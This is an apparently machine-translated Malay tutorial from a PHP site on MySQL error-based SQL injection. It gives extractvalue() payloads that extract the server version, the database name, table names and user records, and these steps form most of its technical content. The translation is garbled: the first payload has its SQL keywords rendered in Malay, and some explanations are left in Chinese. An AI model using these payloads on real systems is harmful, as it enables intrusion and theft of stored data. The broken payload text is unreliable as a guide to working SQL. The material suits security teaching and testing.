Apakah suntikan ralat mysql?-tutorial mysql-php.cn

Rumah

pangkalan data

tutorial mysql

Apakah suntikan ralat mysql?

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Mar 09, 2022 pm 01:58 PM

mysql

Dalam mysql, suntikan ralat merujuk kepada membina pernyataan yang sesuai untuk mendapatkan data yang dikehendaki melalui maklumat ralat yang dilaporkan pada halaman jika sistem aplikasi tidak menutup fungsi ralat pangkalan data, anda boleh menggunakan fungsi extractvalue(). untuk mendapatkan data yang dikehendaki daripada sasaran Satu rentetan yang mengandungi nilai pertanyaan dikembalikan dalam XML.

Apakah suntikan ralat mysql?

Persekitaran pengendalian tutorial ini: sistem Windows 10, versi mysql8.0.22, komputer Dell G3.

Apakah suntikan ralat mysql?

1. Dan dalam keadaan apa ia digunakan?

Suntikan ralat juga boleh dikatakan sejenis suntikan buta------bina muatan supaya maklumat itu bergema melalui gesaan ralat. Anda boleh mempertimbangkan untuk menggunakan suntikan ralat apabila pertanyaan bersama tidak dapat mendedahkan kedudukan yang jelas.

Jadi bagaimanakah suntikan ralat terbentuk?

Pertama, sistem aplikasi tidak menutup fungsi pelaporan ralat pangkalan data Ralat dalam beberapa penyata SQL digemakan secara langsung pada halaman, malah ada yang membocorkan secara langsung nama pangkalan data dan nama jadual

Kedua, adalah penting bahawa fungsi pelaporan ralat MySQL yang sepadan tidak ditapis di latar belakang

2. Fungsi yang biasa digunakan untuk pelaporan ralat

Di sini saya menggunakan extractvalue() fungsi, yang fungsinya adalah untuk mengekstrak nilai daripada sasaran Mengembalikan rentetan yang mengandungi nilai yang ditanya dalam XML

EXTRACTVALUE (XML_document, XPath_string): Parameter pertama: XML_document adalah dalam format Rentetan dan merupakan nama XML document object; Parameter kedua: String)

3. Proses asas

1. Dapatkan maklumat versi

Gunakan pernyataan 1' dan extractvalue(1,concat(0x7e, (pilih @@versi), 0x7e))-- . Antaranya, concat ialah parameter dalam penggabungan (), dan 0x7e ialah simbol ~ selepas penyahkodan. -- ialah watak komen Komen semua kenyataan berikutnya dalam kod sumber untuk mengelakkan ralat. Keputusan selepas ujian adalah seperti berikut:

// 1 sebelum concat ialah parameter pertama bagi fungsi extractvalue(), yang boleh digantikan dengan sebarang nombor

//0x7e kedua dalam pernyataan boleh ditinggalkan

2. Dapatkan nama pangkalan data

Gunakan pernyataan

 1‘ and extractvalue(1,concat(0x7e,(select database()),0x7e))--+，

3. Dapatkan nama jadual

　　　　　1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;),0x7e))--+. 其中group_concat将tale_name字段的所有行放在一行上显示出来，如下所示

4. Dapatkan data

　　　　1&#39; and extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) as a),0x7e))--+. 修改其中的limit参数即可获取users表中的不同行内容

Pembelajaran yang disyorkan:

tutorial video mysql

Atas ialah kandungan terperinci Apakah suntikan ralat mysql?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan

Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Artikel Berkaitan

Apakah enjin penyimpanan yang berbeza di MySQL?Apr 26, 2025 am 12:27 AM

MysqloffersvariousstorageEngines, eachSuitedfordifferentusecases: 1) innodbisidealforapplicationsNeedingacidcomplianceandhighconcurrency, supportingtransactionsandforeignkeys.2) myisamisbestforread-heavyworkloads, lacktransactive.2)

Apakah beberapa kelemahan keselamatan biasa di MySQL?Apr 26, 2025 am 12:27 AM

Kelemahan keselamatan biasa dalam MySQL termasuk suntikan SQL, kata laluan yang lemah, konfigurasi kebenaran yang tidak betul, dan perisian yang tidak dimulakan. 1. Suntikan SQL boleh dicegah dengan menggunakan pernyataan pra -proses. 2. Kata laluan yang lemah boleh dielakkan dengan secara paksa menggunakan strategi kata laluan yang kuat. 3. 4. Perisian yang tidak ditetapkan boleh ditampal dengan kerap memeriksa dan mengemas kini versi MySQL.

Bagaimanakah anda dapat mengenal pasti pertanyaan perlahan di MySQL?Apr 26, 2025 am 12:15 AM

Mengenal pasti pertanyaan perlahan dalam MySQL boleh dicapai dengan membolehkan log pertanyaan perlahan dan menetapkan ambang. 1. Dayakan log pertanyaan perlahan dan tetapkan ambang. 2. Lihat dan menganalisis fail log pertanyaan perlahan, dan gunakan alat seperti mysqldumpslow atau pt-que-digest untuk analisis mendalam. 3. Mengoptimumkan pertanyaan perlahan dapat dicapai melalui pengoptimuman indeks, penulisan pertanyaan dan mengelakkan penggunaan pilih*.

Bagaimana anda boleh memantau kesihatan dan prestasi pelayan MySQL?Apr 26, 2025 am 12:15 AM

Untuk memantau kesihatan dan prestasi pelayan MySQL, anda harus memberi perhatian kepada kesihatan sistem, metrik prestasi dan pelaksanaan pertanyaan. 1) Memantau Kesihatan Sistem: Gunakan perintah atas, htop atau showglobalstatus untuk melihat CPU, memori, cakera I/O dan aktiviti rangkaian. 2) Petunjuk prestasi trek: Memantau petunjuk utama seperti nombor pertanyaan sesaat, masa pertanyaan purata dan kadar hit cache. 3) Pastikan Pengoptimuman Pelaksanaan Pertanyaan: Dayakan log pertanyaan perlahan, rekod dan mengoptimumkan pertanyaan yang masa pelaksanaannya melebihi ambang set.

Bandingkan dan kontras MySQL dan Mariadb.Apr 26, 2025 am 12:08 AM

Perbezaan utama antara MySQL dan MariaDB adalah prestasi, fungsi dan lesen: 1. MySQL dibangunkan oleh Oracle, dan Mariadb adalah garpu. 2. MariaDB boleh melakukan lebih baik dalam persekitaran beban tinggi. 3.MariADB menyediakan lebih banyak enjin dan fungsi penyimpanan. 4.MYSQL mengamalkan lesen dua, dan MariaDB adalah sumber terbuka sepenuhnya. Infrastruktur yang sedia ada, keperluan prestasi, keperluan fungsional dan kos lesen perlu diambil kira apabila memilih.

Bagaimanakah pelesenan MySQL berbanding dengan sistem pangkalan data lain?Apr 25, 2025 am 12:26 AM

MySQL menggunakan lesen GPL. 1) Lesen GPL membolehkan penggunaan percuma, pengubahsuaian dan pengedaran MySQL, tetapi taburan yang diubah suai mesti mematuhi GPL. 2) Lesen komersial boleh mengelakkan pengubahsuaian awam dan sesuai untuk aplikasi komersil yang memerlukan kerahsiaan.

Bilakah anda memilih InnoDB atas myisam, dan sebaliknya?Apr 25, 2025 am 12:22 AM

Keadaan ketika memilih innoDB dan bukannya myisam termasuk: 1) sokongan transaksi, 2) persekitaran konkurensi tinggi, 3) konsistensi data yang tinggi; Sebaliknya, keadaan apabila memilih myisam termasuk: 1) terutamanya membaca operasi, 2) Tiada sokongan transaksi diperlukan. InnoDB sesuai untuk aplikasi yang memerlukan konsistensi data yang tinggi dan pemprosesan urus niaga, seperti platform e-dagang, manakala MyISAM sesuai untuk aplikasi bacaan dan bebas transaksi seperti sistem blog.

Terangkan tujuan kunci asing di MySQL.Apr 25, 2025 am 12:17 AM

Di MySQL, fungsi kunci asing adalah untuk mewujudkan hubungan antara jadual dan memastikan konsistensi dan integriti data. Kekunci asing mengekalkan keberkesanan data melalui pemeriksaan integriti rujukan dan operasi cascading. Perhatikan pengoptimuman prestasi dan elakkan kesilapan biasa apabila menggunakannya.

See all articles